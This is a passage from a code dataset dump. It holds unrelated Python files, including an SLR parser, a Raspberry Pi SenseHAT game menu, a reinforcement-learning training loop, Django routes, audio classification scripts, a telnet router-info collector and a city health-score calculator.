rule[1]:\n\t\t\t\t\t\tf = follow(lhs[0])\n\n\t\t\t\t\t\tfor each_var in f:\n\t\t\t\t\t\t\treduction_list.append([item[0], each_var, \"R\"+str(rule[0])])\n\n\t\texcept:\n\t\t\tpass\n\n\ndef test(string):\n\tglobal action_list, shift_list, reduction_list\n\tdone = False\n\tstack = []\n\tstack.append(0)\n\n\tprint(\"\\n\\nSTACK\\t\\tSTRING\\t\\tACTION\")\n\twhile not done:\n\t\tReduce = False\n\t\tShift = False\n\n\t\tfor r in reduction_list:\n\t\t\tif r[0] == int(stack[-1]) and r[1] == string[0]:\n\t\t\t\tReduce = True\n\t\t\t\tprint(''.join(str(p) for p in stack), \"\\t\\t\", string, \"\\t\\t\", \"Reduce\", r[2])\n\n\t\t\t\tif r[2] == 'Accept':\n\t\t\t\t\treturn 1\n\t\t\t\tvar = rule_dict[int(r[2][1])]\n\t\t\t\tlhs, rhs = var.split(\"->\")\n\n\t\t\t\tfor x in range(len(rhs)):\t\t\t\t\t\n\t\t\t\t\tstack.pop()\n\t\t\t\t\tstack.pop()\n\t\t\t\t\t\n\t\t\t\tvar = lhs\n\t\t\t\tstack.append(var)\n\n\t\t\t\tfor a in action_list:\n\t\t\t\t\tif a[0] == int(stack[-2]) and a[1] == stack[-1]:\n\t\t\t\t\t\tstack.append(str(a[2]))\n\t\t\t\t\t\tbreak\n\t\t\t\t\n\t\tfor g in shift_list:\n\t\t\tif g[0] == int(stack[-1]) and g[1] == string[0]:\n\t\t\t\tShift = True\n\t\t\t\tprint(''.join(str(p) for p in stack), \"\\t\\t\", string, \"\\t\\t\", \"Shift\", \"S\"+str(g[2]))\n\t\t\t\tstack.append(string[0])\n\t\t\t\tstack.append(str(g[2]))\n\t\t\t\tstring = string[1:]\n\n\t\t\t\t\n\t\n\t\tif not Reduce and not Shift:\n\t\t\tprint(''.join(str(p) for p in stack), \"\\t\\t\", string)\n\t\t\treturn 0\n\t\t\t\t\n\n\ndef printGOTO_ACTION():\n global terminals,non_terminals,reduction_list,shift_list\n l=[\" \"]+terminals+['$']+non_terminals\n l2=[]\n for i in range(max(max(shift_list)[0],max(reduction_list)[0])+1):\n l2.append([\" \"]*len(l))\n \n for item in shift_list:\n i=l.index(item[1])\n l2[item[0]][0]='I'+str(item[0])\n if l[i] in non_terminals:\n l2[item[0]][i]=item[2]\n else:\n l2[item[0]][i]='S'+str(item[2])\n for item in reduction_list:\n i=l.index(item[1])\n l2[item[0]][0]='I'+str(item[0])\n l2[item[0]][i]=item[2]\n \n for i in l:\n print(i,\" \",end=\" \")\n print()\n for i in 
l2:\n for j in i:\n print(j,\" \",end=\" \")\n print()\n\n\n\ndef main():\n global I_n, shift_list, reduction_list, action_list, SR, RR\n GOTO()\n reduction()\n \n print(\"\\n--------------------RULES--------------------\")\n for item in rule_dict.items():\n print(item[1])\n print(\"\\n------------AUGMENTED RULES------------------\")\n for item in new_grammar:\n print(item.replace(\".\", \"\"))\n \n print(\"\\n\")\n print(\"Terminals:\", terminals)\n print(\"NonTerminals:\", non_terminals)\n \n print(\"\\n------------------FOLLOW SET--------------------\")\n for item in non_terminals:\n print(item,\": \",follow(item))\n \n print(\"\\n------------------FIRST SET--------------------\")\n for item in non_terminals:\n print(item,\": \",first(item))\n \n print(\"\\n--------------------STATES--------------------\")\n for item in I_n.items():\n print('S'+str(item[0])+':',item[1])\n \n print(\"\\n--------------------GOTO OPERATIONS--------------------\")\n for item in shift_list:\n print(item)\n \n \n print(\"\\n--------------------REDUCTION--------------------\")\n for item in reduction_list:\n print(item)\n \n print(\"\\n-----------ACTION & GOTO TABLE--------------------\")\n printGOTO_ACTION()\n \n if Conflict():\n if SR != []:\n print(\"SR conflict\")\n for item in SR:\n print(item)\n print()\n if RR != []:\n print(\"RR conflict\")\n for item in RR:\n print(item)\n print()\n exit(0)\n \n else:\n print(\"\\nNO CONFLICT\")\n \n action_list.extend(shift_list)\n action_list.extend(reduction_list)\n\n string = str(input(\"\\n\\nEnter String:: \"))\n \n try:\n if string[-1] != \"$\":\n string = string + \"$\"\n except:\n print(\"InputError\")\n exit(0)\n \n print(\"\\nTest String:\", string)\n result = test(string)\n \n if result == 1:\n print(\"---ACCEPTED---\")\n elif result == 0:\n print(\"---NOT ACCEPTED---\")\n return 0\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"slr.py","file_name":"slr.py","file_ext":"py","file_size_in_byte":8620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503273651","text":"\"\"\"\nFile: games.py\nAuthor: Raphael Holzer\nDate: 27.01.2019\n\nThis module imports 6 SenseHAT game modules:\n- morpion\n- game2048\n- mines\n- tetris\n- connect4\n- labyrinth\n\"\"\"\n\nfrom sense_hat import SenseHat\nfrom gamelib import *\nimport morpionfinal\nimport game2048\nimport mines\nimport tetris\nimport connect4\nimport labyrinth\n\n\ndef main():\n \"\"\"Present a question mark (?) 
and allow to choose a game.\n The left/right button increments/decrements the index number.\n The up button displays the game name.\n The middle button starts the selected game.\n \"\"\"\n \n active = True\n sense = SenseHat()\n \n games = ['morpion', '2048', 'mines', 'connect4', 'tetris', 'labyrinth']\n functions = [morpionfinal.main, game2048.main, mines.main, connect4.main,\n tetris.main, labyrinth.main]\n i = 0\n n = len(games)\n \n sense.show_message('games', text_colour=BLUE)\n sense.show_letter('?')\n\n while active:\n event = sense.stick.wait_for_event()\n if event.action == 'pressed':\n if event.direction == 'right':\n i = (i+1) % n\n elif event.direction == 'left':\n i = (i-1) % n\n elif event.direction == 'up':\n sense.show_message(games[i], text_colour=GREEN)\n \n elif event.direction == 'middle':\n functions[i]()\n \n sense.stick.get_events() \n sense.show_letter(str(i), text_colour=RED)\n\n\n# Execute the main() function when the file is executed,\n# but do not execute when the module is imported as a module.\nprint('module name =', __name__)\n\nif __name__ == '__main__':\n main() ","sub_path":"games/2048/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531599937","text":"\"\"\"\nSingle instance run Gym with marl\n\"\"\"\n\nimport argparse\nimport os\nimport pprint\nimport numpy as np\n\nimport ray\nimport yaml\n\nfrom malib import settings\n\nfrom malib.agent import get_training_agent\nfrom malib.rollout import rollout_func\nfrom malib.utils import logger\nfrom malib.utils.logger import Log\nfrom malib.envs import GymEnv\nfrom malib.rollout.rollout_worker import RolloutWorker\nfrom malib.backend.datapool.offline_dataset_server import Episode\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nparser = argparse.ArgumentParser(\n \"Single instance of MARL training on gym environments.\"\n)\nparser.add_argument(\n \"--config\", type=str, help=\"YAML configuration path.\", required=True\n)\nparser.add_argument(\n \"--threaded\", action=\"store_true\", help=\"Whether use threaded sampling.\"\n)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n with open(os.path.join(BASE_DIR, args.config), \"r\") as f:\n config = yaml.load(f)\n\n # ================== Clean configuration =================================================================\n env_desc = config[\"env_description\"]\n env_desc[\"config\"] = env_desc.get(\"config\", {})\n env_desc[\"creator\"] = GymEnv\n env = GymEnv(**env_desc[\"config\"])\n\n possible_agents = env.possible_agents\n observation_spaces = env.observation_spaces\n action_spaces = env.action_spaces\n\n env_desc[\"possible_agents\"] = env.possible_agents\n env.close()\n\n agent_mapping_func = lambda agent: \"share\"\n\n if args.threaded:\n ray.init()\n\n exp_cfg = logger.start(group=\"single_instance\", name=\"marl\")\n # ========================================================================================================\n\n global_step = 0\n\n _logger = logger.get_logger(\n log_level=settings.LOG_LEVEL,\n name=\"single_instance_marl\",\n remote=settings.USE_REMOTE_LOGGER,\n mongo=settings.USE_MONGO_LOGGER,\n **exp_cfg,\n )\n\n # ==================================== Init learners and rollout =========================================\n learners = {}\n for env_agent_id in env.possible_agents:\n interface_id = agent_mapping_func(env_agent_id)\n if learners.get(interface_id) is None:\n 
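# first use of this interface id: build the shared training agent for it\n 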
learners[interface_id] = get_training_agent(\n config[\"training\"][\"interface\"][\"type\"]\n )(\n assign_id=interface_id,\n env_desc=env_desc,\n training_agent_mapping=None,\n algorithm_candidates=config[\"algorithms\"],\n observation_spaces=observation_spaces,\n action_spaces=action_spaces,\n exp_cfg=exp_cfg,\n )\n learners[interface_id].register_env_agent(env_agent_id)\n\n rollout_handler = RolloutWorker(\n worker_index=None,\n env_desc=env_desc,\n metric_type=config[\"rollout\"][\"metric_type\"],\n remote=False,\n exp_cfg=exp_cfg,\n )\n # =======================================================================================================\n\n # ================================= Register policies for agents and create buffers =====================\n trainable_policy_mapping = {}\n for learner in learners.values():\n for agent in learner.agent_group():\n pid, policy = learner.add_policy_for_agent(agent, trainable=True)\n # record policy information\n # register policy into rollout handlers\n rollout_handler.update_population(agent, pid, policy)\n trainable_policy_mapping[agent] = pid\n\n agent_episodes = {\n aid: Episode(\n env_desc[\"config\"][\"env_id\"],\n trainable_policy_mapping,\n capacity=config[\"dataset_config\"][\"episode_capacity\"],\n )\n for aid in env_desc[\"possible_agents\"]\n }\n\n stationary_policy_distribution = {\n aid: {pid: 1.0} for aid, pid in trainable_policy_mapping.items()\n }\n # ======================================================================================================\n\n # ==================================== Main loop =======================================================\n for epoch in range(1000):\n print(f\"\\n==================== epoch #{epoch} ===============\")\n total_frames = 0\n min_size = 0\n with Log.stat_feedback(\n log=True,\n logger=_logger,\n worker_idx=\"Rollout\",\n global_step=epoch,\n group=\"single_instance\",\n ) as (statistic_seq, processed_statistics):\n while min_size < config[\"dataset_config\"][\"learning_start\"]:\n statistics, num_frames = rollout_handler.sample(\n callback=rollout_func.simultaneous,\n num_episodes=config[\"rollout\"][\"num_episodes\"],\n fragment_length=config[\"rollout\"][\"fragment_length\"],\n policy_combinations=[trainable_policy_mapping],\n explore=True,\n role=\"rollout\",\n policy_distribution=stationary_policy_distribution,\n threaded=args.threaded,\n episodes=agent_episodes,\n )\n statistic_seq.extend(statistics)\n min_size = min([e.size for e in agent_episodes.values()])\n total_frames += num_frames\n\n print(\"rollout statistics:\")\n pprint.pprint(processed_statistics[0])\n print(\"sampled new frames:\", total_frames, \"total_size:\", min_size)\n\n batches = {}\n idxes = np.random.choice(min_size, config[\"training\"][\"config\"][\"batch_size\"])\n for agent in env.possible_agents:\n batch = agent_episodes[agent].sample(idxes=idxes)\n batches[agent] = batch\n\n print(\"-------------- traininig -------\")\n for iid, interface in learners.items():\n with Log.stat_feedback(\n log=True,\n logger=_logger,\n worker_idx=iid,\n global_step=global_step,\n group=\"single_instance\",\n ) as (statistics_seq, processed_statistics):\n statistics_seq.append(\n learners[iid].optimize(\n policy_ids=trainable_policy_mapping.copy(),\n batch=batches,\n training_config=config[\"training\"][\"config\"],\n )\n )\n pprint.pprint(processed_statistics[0])\n global_step += 1\n # =====================================================================================================\n 
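# close out experiment logging before the script exits\n 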
logger.terminate()\n","sub_path":"examples/single_instance_gym.py","file_name":"single_instance_gym.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474602384","text":"import tile\n\nclass LabeledTile(tile.Tile):\n\n\tdef __init__(self, size, label='LABEL HERE', tileOrientation='vertical', labelSize=30,\n\t\t\ttiles=[], **kwargs):\n\n\t\tlabelTile = { 'name' : 'label', 'class' : 'TextField', 'size' : labelSize}\n\t\ttiles = [labelTile] + tiles\n\t\tsuper(LabeledTile, self).__init__(size, tiles)\n\t\tself.update(label={'value': label})\n","sub_path":"opencvgui/labeled_tile.py","file_name":"labeled_tile.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"464676911","text":"from django.urls import path\nfrom app_task import views\n\n\nurlpatterns = [\n # Task list\n path('task_list/', views.task_list),\n # Add a task\n path('task_add/', views.task_add),\n # Edit a task\n path('task_edit//', views.task_edit),\n # Test case nodes (tree view)\n path('case_node/', views.case_node),\n # Save a task\n path('task_save/', views.task_save),\n # Delete a task\n path('task_delete/', views.task_delete),\n # Run a task\n path('task_run//', views.task_run),\n # Task log\n path('task_log//', views.task_log),\n # Detailed log\n path('details_log/', views.details_log),\n]\n\n","sub_path":"mysite/app_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"488996617","text":"import unittest\nimport brain\n\n\nclass FnctTest(unittest.TestCase):\n\n def test(self):\n net = brain.NeuralNetwork()\n net.train([\n ([0, 0], [0]),\n ([0, 1], [1]),\n ([1, 0], [1]),\n ([1, 1], [0])\n ])\n print(net.to_function('test_nn'))\n","sub_path":"tests/test_fnct.py","file_name":"test_fnct.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"348449948","text":"import cv2\nimport pandas as pd\nimport numpy as np\nimport scipy.misc\nimport os\nimport sklearn\nfrom sklearn import svm\nimport matplotlib.pyplot as plt\nfrom random import shuffle\nimport tensorflow as tf\nimport matplotlib.image as mpimg\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.estimator import regression\nfrom PIL import Image, ImageDraw, ImageFont\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\nimport librosa\n\ndef MinLen(L):\n m=90\n for i in L:\n x=len(i)\n if x<m:\n m=x\n return m\n\ndef Avg(L):\n # assumed behavior: average each MFCC matrix over its time axis to\n # get one fixed-length feature vector per clip\n return [np.mean(i, axis=1) for i in L]\n\ndef Trim(L):\n NL=[]\n for i in L:\n r=i.shape[1]\n if r>15:\n d=r-15\n i=np.delete(i, np.s_[-d:], axis=1)\n #i=i[:][:-d]\n NL.append(i)\n else:\n NL.append(i)\n return NL\n\nTRAIN_DIR = 'train'\nTEST_DIR = 'test'\nf=[]\nlabels=[]\nfor a in (os.listdir(TRAIN_DIR)):\n audio_path = os.path.join(TRAIN_DIR, a)\n x , sr = librosa.load(audio_path)\n mfcc = librosa.feature.mfcc(x, sr=sr)\n mfcc = sklearn.preprocessing.scale(mfcc, axis=1)\n f.append(mfcc)\n labels.append(int(a[0]))\nTF=[]\nTlabels=[]\nfor a in (os.listdir(TEST_DIR)):\n audio_path = os.path.join(TEST_DIR, a)\n x , sr = librosa.load(audio_path)\n mfcc = librosa.feature.mfcc(x, sr=sr)\n mfcc = sklearn.preprocessing.scale(mfcc, axis=1)\n TF.append(mfcc)\n Tlabels.append(int(a[0]))\n\nf=Trim(f)\nm=Avg(f)\n\n\nTF=Trim(TF)\ntm=Avg(TF)\n\nX_tarin= np.array(m)\ny_train= 
labels\n\nX_test= np.array(tm)\ny_test= Tlabels\n\nclf = svm.SVC(gamma=0.001, C=10)\nclf.fit(X_tarin, y_train)\nacc=0\nprediction=clf.predict(X_test)\nfor i in range(len(prediction)):\n if prediction[i]==Tlabels[i]:\n acc+=1\nprint((acc/len(prediction)*100),'%')\n","sub_path":"Speech.py","file_name":"Speech.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541247643","text":"import os\nimport sys\n\n#init values\noverlap = 1024\nframe_length = 2048\n\nfrom scipy.io import wavfile\n\ndef readAudio(audio):\n fs, amp = wavfile.read(audio)\n dt = 1/fs\n n = len(amp)\n t = dt*n\n\n if t > 1.0:\n amp = amp[int((t/2 - 0.5)/dt):int((t/2 + 0.5)/dt)]\n n = len(amp)\n t = dt*n\n \n return(amp, fs)\n\nimport librosa\nimport librosa.display\nimport numpy as np\nimport cv2\n\ndef makeSpectogram(amp, fs):\n S = librosa.feature.melspectrogram(y=amp*1.0, sr=fs, n_fft=frame_length, hop_length=overlap, power=2.0)\n sepectogram = librosa.power_to_db(S,ref=np.max)\n return cv2.resize(sepectogram.round(3),(64,64)).tolist()\n\ndatadir = \"/home/sywi/Documents/voicePathology/source/CNN/dataset/healthy\"\nfulldir = os.path.join(os.getcwd(), datadir)\nallfiles = os.listdir(fulldir)\n\noutput = {}\noutput['status'] = 0\n\nimport json\n\nfor filename in allfiles:\n filepath = os.path.join(datadir, filename)\n name = filename.split(\".\")[0]\n amp, fs = readAudio(filepath) \n \n output['spectogram'] = makeSpectogram(amp, fs) \n\n completeName = os.path.join('/home/sywi/Documents/voicePathology/source/CNN/data/', name + '.json') \n\n with open(completeName, 'w') as outfile:\n json.dump(output, outfile)\n\n","sub_path":"source/CNN/make_spectrogram.py","file_name":"make_spectrogram.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522271323","text":"BC_PORT=1883\nimport sys\nimport time\nfrom socket import *\ndef broadcas(se,ip):\n se=bytes(se.encode())\n s=socket(AF_INET,SOCK_DGRAM)\n s.bind(('',0))\n s.setsockopt(SOL_SOCKET,SO_BROADCAST,1)\n s.sendto(se,(ip,BC_PORT))\n","sub_path":"proj/pysen.py","file_name":"pysen.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"248080357","text":"\"\"\"Get Router Info\"\"\"\nimport telnet_router\nimport json\ndef get_routers(filename):\n '''\n connect to routers from ip in json_file and return list of TN_ROUTER obj\n [\n {\n \"device\":\"127.0.0.1\", \n \"username\":\"MarinePA\", \n \"password\":\"cisco\", \n \"en_password\":\"class\"\n }, ...\n ]\n '''\n with open(filename, 'r') as json_file:\n add_list = json.loads(json_file.read())\n print(\"Addresses :\" + str(add_list))\n routers = [telnet_router.TN_ROUTER(router['device'], router['username'], \\\n router['password'], router['en_password']) for router in add_list]\n return routers\n\ndef get_routers_info():\n \"\"\"get all router info and save into file\"\"\"\n routers = get_routers('xxx.json')\n routers_info_list = [\\\n {'name':router.get_device_name(), 'spec':router.get_router_spec(), \\\n 'interface':router.get_router_interfaces(), 'routing table':router.get_routing_table()} \\\n for router in routers]\n data = \"\"\n for router_info in routers_info_list:\n data += router_info['name'] + '\\n====Specification====\\n'\n data += router_info['spec'] + '\\n====Interfaces====\\n'\n data += '\\n'.join([''.join([str(k) + \": \" + 
str(interface[k])]) + '\n' \\\n for interface in router_info['interface'] for k in interface]) + '\n====Routing Table====\n'\n data += router_info['routing table'] + '\n'\n \n with open('routers_info.txt', 'w') as text_file:\n text_file.write(data)\n \n\nget_routers_info()\n","sub_path":"get_routers_info.py","file_name":"get_routers_info.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"112181325","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport json\n\n##################################################\ndf_corrected_cities_states = pd.read_csv('data/corrected_cities_states_Kelsey.csv')\n\nus_state_abbrev = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Northern Mariana Islands': 'MP',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Palau': 'PW',\n 'Pennsylvania': 'PA',\n 'Puerto Rico': 'PR',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virgin Islands': 'VI',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY',\n}\n\ndf_corrected_cities_states = df_corrected_cities_states.rename(columns={'State': 'state',\n 'City': 'metro_name'})\ndf_corrected_cities_states['state_code'] = df_corrected_cities_states.state.map(us_state_abbrev)\n\nmapper_metro_to_metro_name = dict(zip(df_corrected_cities_states.metro_normed,\n df_corrected_cities_states.metro_name))\n\nmapper_metro_to_state = dict(zip(df_corrected_cities_states.metro_normed,\n df_corrected_cities_states.state))\n\ndict_state_code_mapper = 
dict(zip(us_state_abbrev.values(), us_state_abbrev.keys()))\n\n##\nwith open('back_end_dev/dict_data_scaler.pkl', 'rb') as handle:\n dict_data_scaler = pickle.load(handle)\n\n##\ndf = df_corrected_cities_states.copy()\ndf = dict_data_scaler['df_standardized'].copy()\n\ndf['metro_name'] = df.metro_normed.map(mapper_metro_to_metro_name)\ndf['state'] = df.metro_normed.map(mapper_metro_to_state)\ndf['state_code'] = df.state.map(us_state_abbrev)\n\n##\nscaler = dict_data_scaler['scaler']\ndf_dist_min_max = dict_data_scaler['df_dist_min_max']\n\n## new structure of json file\ndf_states_divided = df.copy()\n\ndf_states_divided.sort_values(by=['state', 'metro_name'], inplace=True)\n\ndf_states_divided.loc[:, ['state', 'metro_name']]\n\n##\n\n\n# to create nested dictionary\ndict_final_all_state = {}\nfor state_code in list(df_states_divided['state_code'].unique()):\n df_temp_one_state_code = None\n df_temp_one_state_code = \\\n df_states_divided[df_states_divided['state_code'] == state_code].copy()\n\n df_temp_one_state_code.sort_values(by=['state', 'metro_name'], inplace=True)\n\n ##\n dict_temp_all_metros_in_one_state = {}\n for _, row in df_temp_one_state_code.iterrows():\n dict_temp_metro = dict()\n # print(row['metro_normed'])\n\n # Scores\n dict_metro_scores = {}\n dict_metro_scores['HealthcareCoverage'] = round(1 - float(row['uninsured_ratio']), 2)\n dict_metro_scores['ParkAccessibility'] = round(row['park_access_ratio'], 2)\n dict_metro_scores['AccessToHealthyFood'] = round(row['food_first_pc'], 2)\n dict_metro_scores['EducationLevel'] = round(row['education_weight'], 2)\n dict_metro_scores['CivicEngagement'] = round(row['voters_ratio'], 2)\n\n # Responses\n dict_temp_responses = {}\n\n ##\n map_vote = {0: 'No', 1: 'YES'}\n dict_temp_vote = {}\n for voting_likelihood in [0, 1]:\n dict_temp_vote[map_vote[voting_likelihood]] = \\\n abs(round(voting_likelihood - row['voters_ratio'], 2))\n\n ##\n dict_temp_responses['Vote'] = dict_temp_vote\n\n ##\n dict_temp_fruit = {}\n for fruit_per_day in np.linspace(0.5, 2.0, 4):\n food_first_pc = (11 / 1.5) * (fruit_per_day - 0.5) - 5\n food_first_pc_std = scaler.transform([[0, 0, food_first_pc, 0, 0]])[0][2]\n if food_first_pc_std < 0:\n food_first_pc_std = 0\n if food_first_pc_std > 1:\n food_first_pc_std = 1\n dict_temp_fruit[fruit_per_day] = \\\n abs(round(food_first_pc_std - row['food_first_pc'], 2))\n\n dict_temp_responses['Fruit'] = dict_temp_fruit\n\n ##\n dict_temp_education = {}\n mapper_education = {'LESS THAN 1ST GRADE': 0,\n '1ST, 2ND, 3RD OR 4TH GRADE': 1,\n '5TH OR 6TH GRADE': 2,\n '7TH OR 8TH GRADE': 3,\n '9TH GRADE': 4,\n '10TH GRADE': 5,\n '11TH GRADE': 6,\n '12TH GRADE NO DIPLOMA': 7,\n 'HIGH SCHOOL GRAD-DIPLOMA OR EQUIV (GED)': 8,\n 'SOME COLLEGE BUT NO DEGREE': 9,\n 'ASSOCIATE DEGREE-OCCUPATIONAL/VOCATIONAL': 10,\n 'ASSOCIATEDEGREE-ACADEMICPROGRAM': 11,\n \"BACHELOR'S DEGREE (EX: BA, AB, BS)\": 12,\n \"MASTER'S DEGREE (EX:MA,MS,MEng,MEd, MSW)\": 13,\n \"PROFESSIONAL SCHOOL DEG (EX:MD, DDS, DVM)\": 14,\n \"DOCTORATE DEGREE (EX: PhD, EdD)\": 14}\n for education in ['LESS THAN 1ST GRADE',\n '1ST, 2ND, 3RD OR 4TH GRADE',\n '5TH OR 6TH GRADE',\n '7TH OR 8TH GRADE',\n '9TH GRADE',\n '10TH GRADE',\n '11TH GRADE',\n '12TH GRADE NO DIPLOMA',\n 'HIGH SCHOOL GRAD-DIPLOMA OR EQUIV (GED)',\n 'SOME COLLEGE BUT NO DEGREE',\n 'ASSOCIATE DEGREE-OCCUPATIONAL/VOCATIONAL',\n 'ASSOCIATEDEGREE-ACADEMICPROGRAM',\n \"BACHELOR'S DEGREE (EX: BA, AB, BS)\",\n \"MASTER'S DEGREE (EX:MA,MS,MEng,MEd, MSW)\",\n 'PROFESSIONAL SCHOOL DEG (EX:MD, DDS, DVM)',\n 
'DOCTORATE DEGREE (EX: PhD, EdD)']:\n education_rank = mapper_education[education]\n\n ## education_weight varies between 8.056 and 10.49\n education_rank_std = scaler.transform([[0, education_rank, 0, 0, 0]])[0][1]\n\n dict_temp_education[education] = \\\n abs(round(education_rank_std - row['education_weight'], 2))\n\n ##\n dict_temp_responses['Education'] = dict_temp_education\n\n ##\n map_park_access = {0: 'No', 1: 'YES'}\n dict_temp_park_access = {}\n for park_access in [0, 1]:\n dict_temp_park_access[map_park_access[park_access]] = \\\n abs(round(park_access - row['park_access_ratio'], 2))\n\n ##\n dict_temp_responses['Parks'] = dict_temp_park_access\n\n ##\n map_insured = {0: 'No', 1: 'YES'}\n dict_temp_insured = {}\n for insured in [0, 1]:\n uninsured = 1 - insured\n dict_temp_insured[map_insured[insured]] = \\\n abs(round(uninsured - row['uninsured_ratio'], 2))\n\n ##\n dict_temp_responses['Insured'] = dict_temp_insured\n\n ##\n min_distance = round(df_dist_min_max.loc[df_dist_min_max.metro == row['metro_normed'],\n 'distance_least'].values[0], 2)\n max_distance = round(df_dist_min_max.loc[df_dist_min_max.metro == row['metro_normed'],\n 'distance_most'].values[0], 2)\n dict_temp_metro['Min_Max'] = str([min_distance, max_distance])\n dict_temp_metro['Responses'] = dict_temp_responses\n dict_temp_metro['Scores'] = dict_metro_scores\n dict_temp_metro['AVG_Scores'] = round(np.mean(list(dict_metro_scores.values())), 3)\n print(dict_temp_metro['AVG_Scores'])\n\n ##\n dict_temp_all_metros_in_one_state[row['metro_name']] = dict_temp_metro\n\n ##\n dict_final_all_state[state_code] = dict_temp_all_metros_in_one_state\n#####################################################################\n\nlist_all_states = []\nfor s in list(dict_final_all_state.keys()):\n dict_one_state = {}\n dict_one_state[\"Name\"] = dict_state_code_mapper[s]\n dict_one_state[\"Code\"] = s\n list_all_cities_in_one_state = []\n for c in list(dict_final_all_state[s].keys()):\n dict_one_city = {}\n Name = c\n Scores = dict_final_all_state[s][c]['Scores']\n Responses = dict_final_all_state[s][c]['Responses']\n Min_Max = dict_final_all_state[s][c]['Min_Max']\n AVG_Score = dict_final_all_state[s][c]['AVG_Scores']\n dict_one_city[\"Name\"] = Name.split(\"-\")[0].strip().split(\"/\")[-1].strip()\n print(dict_one_city[\"Name\"])\n dict_one_city[\"Code\"] = str.lower(s.strip() + dict_one_city[\"Name\"].replace(\" \", \"\"))\n dict_one_city[\"Scores\"] = Scores\n dict_one_city[\"Responses\"] = Responses\n dict_one_city[\"min_max\"] = Min_Max\n dict_one_city[\"AVG_Score\"] = AVG_Score\n list_all_cities_in_one_state.append(dict_one_city)\n dict_one_state[\"Cities\"] = list_all_cities_in_one_state\n list_all_states.append(dict_one_state)\n\ndict_final = {}\ndict_final[\"States\"] = list_all_states\nlist_final = [dict_final]\n\n######################################################################\nwith open('back_end_dev/json_6_with_avg_score.json', 'w', encoding='utf-8') as f:\n json.dump(list_final, f, ensure_ascii=False)\n","sub_path":"back_end_dev/similarity_calculator_6_with_avgScore.py","file_name":"similarity_calculator_6_with_avgScore.py","file_ext":"py","file_size_in_byte":11351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31919663","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport time\n\nfrom pip_services3_components.cache import ICache\n\nKEY1: str = \"key1\"\nKEY2: str = \"key2\"\nKEY3: str = \"key3\"\nKEY4: str = \"key4\"\nKEY5: str = 
\"key5\"\nKEY6: str = \"key6\"\n\nVALUE1: str = \"value1\"\nVALUE2: dict = {'val': \"value2\"}\nVALUE3 = datetime.datetime.now()\nVALUE4 = [1, 2, 3, 4]\nVALUE5 = 12345\nVALUE6 = None\n\n\nclass CacheFixture:\n\n def __init__(self, cache: ICache):\n self.__cache = cache\n\n def test_store_and_retrieve(self):\n self.__cache.store(None, KEY1, VALUE1, 5000)\n self.__cache.store(None, KEY2, VALUE2, 5000)\n self.__cache.store(None, KEY3, VALUE3, 5000)\n self.__cache.store(None, KEY4, VALUE4, 5000)\n self.__cache.store(None, KEY5, VALUE5, 5000)\n self.__cache.store(None, KEY6, VALUE6, 5000)\n\n time.sleep(0.5)\n\n val = self.__cache.retrieve(None, KEY1)\n assert val is not None\n assert VALUE1 == val\n\n val = self.__cache.retrieve(None, KEY2)\n assert val is not None\n assert VALUE2['val'] == val['val']\n\n val = self.__cache.retrieve(None, KEY3)\n assert val is not None\n assert json.loads(json.dumps(VALUE3, 